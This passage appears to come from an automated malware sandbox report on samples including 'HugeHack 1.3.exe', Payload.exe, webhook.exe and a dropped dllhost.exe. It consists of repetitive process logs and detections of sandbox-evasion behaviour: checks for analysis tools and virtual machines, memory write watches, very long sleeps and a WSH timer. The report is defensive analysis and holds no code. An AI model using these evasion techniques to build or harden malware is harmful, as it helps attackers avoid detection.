Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: WIRESHARK.EXE

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Memory allocated: 1120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Memory allocated: 1320000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: B60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 4930000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 31B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1500000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 65B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 75B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 35B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 55B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 4700000 memory commit \| memory reserve \| memory write watch

Contains functionality to detect virtual machines (SLDT)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 5_3_151FE91C sldt word ptr [eax]

5_3_151FE91C

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599685	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598026	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597503	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 375
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1554
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 422
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 1009
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 630
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1740

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\Payload.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe TID: 7644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -599828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -599685s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -598026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -597503s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228	Thread sleep count: 407 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2996	Thread sleep time: -211000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2996	Thread sleep time: -77500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1384	Thread sleep count: 1740 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 7568	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3340	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599685	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 598026	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597503	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
